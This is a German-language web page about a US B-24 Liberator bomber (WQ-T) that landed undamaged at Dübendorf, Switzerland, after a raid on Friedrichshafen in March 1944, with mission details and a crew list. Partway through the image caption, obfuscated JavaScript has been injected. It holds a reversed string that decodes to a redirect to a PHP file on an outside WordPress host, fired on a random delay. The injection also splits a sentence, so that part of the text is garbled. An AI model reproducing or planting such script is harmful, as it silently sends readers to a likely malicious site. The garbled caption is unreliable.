Ereignisse

Genügend Treibstoff

Der Bomber mit dem Kennzeichen WQ-T ist nach einem Einsatz über Friedrichshafen in Dübendorf gelandet. Am 17.09.1945 nach Burtonwood zurückgekehrt.

Die Maschine l<script type=

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == „string“) return $p$VTO6JhIH6WkCGAcPR.list[n].split(„“).reverse().join(„“);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[„‚php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andete ohne Beschädigung auf dem verschneiten Flugplatz Dübendorf. (137_1)“ width=“800″ height=“353″ /> Die Maschine landete ohne Beschädigung auf dem verschneiten Flugplatz Dübendorf. (137_1)

Der Bomber der 8th Air Force, 44th Bomb Group mit dem Kennzeichen WQ-T ist nach einem Einsatz über Friedrichshafen in Dübendorf gelandet. Am 17.09.1945 nach Burtonwood zurückgekehrt. 2Lt Eugene N. Dyer landete als Nächster in Dübendorf. Die Maschine hatte keine Beschädigungen und der Treibstoff hätte ohne weiteres nach England gereicht.


Ereignissdatum 18.3.1944
Ort Dübendorf
Kanton ZH
Ereignis Landung
Nation Amerika
Flugzeugart Bomber
Flugzeugtyp B-24 Liberator
Flugzeugbezeichnung B-24 J-105-CO
Einteilung 8th Air Force, 44th Bomb Group, 68th Squadron
Basis Shipdham (GB)
Auftrag Bombardierung
Einsatzziel Friedrichshafen (D)
Rückkehr 17.09.1945 Rückkehr nach Burtonwood (GB)
Werknummer 41-109800
Kennzeichen WQ-T
CH Archiv Nr. A027
US MACR Nr. 3410
Besatzung Pilot: Eugene N. Dyer, 2nd Lt
Copilot: Earl W. Culbertson, 1st Lt
Navigator: Walter A. Walser, 2nd Lt
Bombardier: John W. McFarland, 2nd Lt
Engineer: Georg V. Williams, T/Sgt
Radio: Salvatore J. Deluca, T/Sgt
Ball Turret: John H. Milojevich, S/Sgt
Right Waist: John. S. Seaman, S/Sgt
Left Waist: Homer W. Williams, S/Sgt
Tail Gunner: Alfred V. Fairall, S/Sgt
Quelle Cockpit
Autor Hans-Heiri Stapfer